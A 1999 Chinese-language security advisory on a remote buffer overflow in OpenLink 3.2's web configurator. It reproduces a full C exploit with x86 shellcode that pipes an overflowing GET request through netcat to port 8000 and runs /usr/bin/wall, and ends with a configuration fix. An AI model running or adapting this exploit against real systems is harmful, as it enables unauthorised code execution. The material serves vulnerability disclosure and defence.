OpenLink 3.2存在远程缓冲溢出漏洞发布时间:1999-10-19 更新时间:1999-10-19 严重程度:高 威胁程度:远程管理员权限 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Misc详细描述 使用在UNIX和NT平台下的OPENLINK3.2都发现存在着远程溢出攻击。此问题存在于OPENLINK3.2随带的网站配置工具,由于设计的错误调用了strcpy()函数,而strcpy()存在着不检查边界的漏洞。使用此项漏洞其结果是使用OPENLINK来执行任何目标主机中的两进制代码。 测试代码 #include #include /* * Exploit for Openlink's web configurator for Linux/glibc2 * use: pipe through netcat to openlink web port (8000 default) * ex: ./oplwall 0xbffffb85 | nc machine.to.hit 8000 * makes www_sv execute /usr/bin/wall if you hit the address right * * For informational purposes only. This was written to show that * there's a problem, not for skr1pt k1dd33z --. * don't ask me for help on how to use this to crack systems, * help compiling or anything else. It will only compile on * an x86 compiler however. * * Addresses that work for me: 0xbffffb65 (initial run of the broker) * 0xbffffb85 (all consecutive attempts) * probably tied to process ID www_sv runs as; * first try PIDs were in triple digits, others * 4 digit PIDs. * * If this works, generally no more www_sv processes will be run as a side effect. */ void test() { __asm__(" jmp doit exploit: # code basically from Aleph One's smash stacking article, with # minor mods popl %esi movb $0xd0, %al # Get a / character into %al xorb $0xff, %al movb %al, 0x1(%esi) # drop /s into place movb %al, 0x5(%esi) movb %al, 0x9(%esi) xorl %eax,%eax # clear %eax movb %eax,0xe(%esi) # drop a 0 at end of string movl %eax,0x13(%esi) # drop NULL for environment leal 0x13(%esi),%edx # point %edx to environment movl %esi,0xf(%esi) # drop pointer to argv leal 0xf(%esi),%ecx # point %ecx to argv movl %esi,%ebx # point ebx to command - 1 inc %ebx # fix it to point to the right place movb $0xb,%al # index to execve syscall int $0x80 # execute it xorl %ebx,%ebx # if exec failed, exit nicely... movl %ebx,%eax inc %eax int $0x80 doit: call exploit .string \"..usr.bin.wall.\" "); } char *shellcode = ((char *)test) + 3; char code[1000]; int main(int argc, char *argv[]) { int i; int left; unsigned char where[] = {"\0\0\0\0\0"} ; int *here; char *dummy; long addr; if (argc > 1) addr = strtoul(argv[1], &dummy, 0); else addr = 0xbffffb85; fprintf(stderr, "Setting address to %8x\n", addr); *((long *)where) = addr; strcpy(code, shellcode); for (i = 0; i < 64; i++) { strcat(code, where); } printf("GET %s\n", code); exit(0); } --- cut --- 编译后输入./oplwall 0xbffffb85 | nc machine.to.hit 8000,但在命令行中要调整堆栈地址如 (0xbffffb65, 0xbffffb85 或 0xbffffbe5) 此程序将执行WALL--一个向所有登录用户广播消息的命令 解决方案 在oplaqb.ini中关闭掉www_sv应用程序,在默认状态下此 服务被标为连续服务。在[Persistent Services]的 Configurator = www_sv和[www_sv]下的全部语句前加上 分号. ;[Persistent Services] ;Configurator = www_sv ;[www_sv] ;Program = w3config/www_sv ;Directory = w3config ;CommandLine = ;Environment = WWW_SV ;[Environment WWW_SV] 相关信息 |
